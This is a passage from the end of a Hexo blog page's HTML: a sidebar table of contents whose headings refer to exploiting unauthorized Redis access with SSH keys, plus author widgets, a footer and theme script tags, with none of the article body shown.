class="nav-link" href="#2-%E5%BC%80%E6%B7%A6-2"><span class="nav-number">1.0.2.</span> <span class="nav-text">2 开淦</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AEredis%E5%88%A9%E7%94%A8SSH-key"><span class="nav-number">2.</span> <span class="nav-text">0x04 未授权访问redis利用SSH key</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%89%8D%E6%8F%90-3"><span class="nav-number">2.0.1.</span> <span class="nav-text">1 前提</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%BC%80%E6%B7%A6-3"><span class="nav-number">2.0.2.</span> <span class="nav-text">2 开淦</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-%E5%8F%82%E8%80%83"><span class="nav-number">3.</span> <span class="nav-text">0x05 参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">keaitm</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">keaitm</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
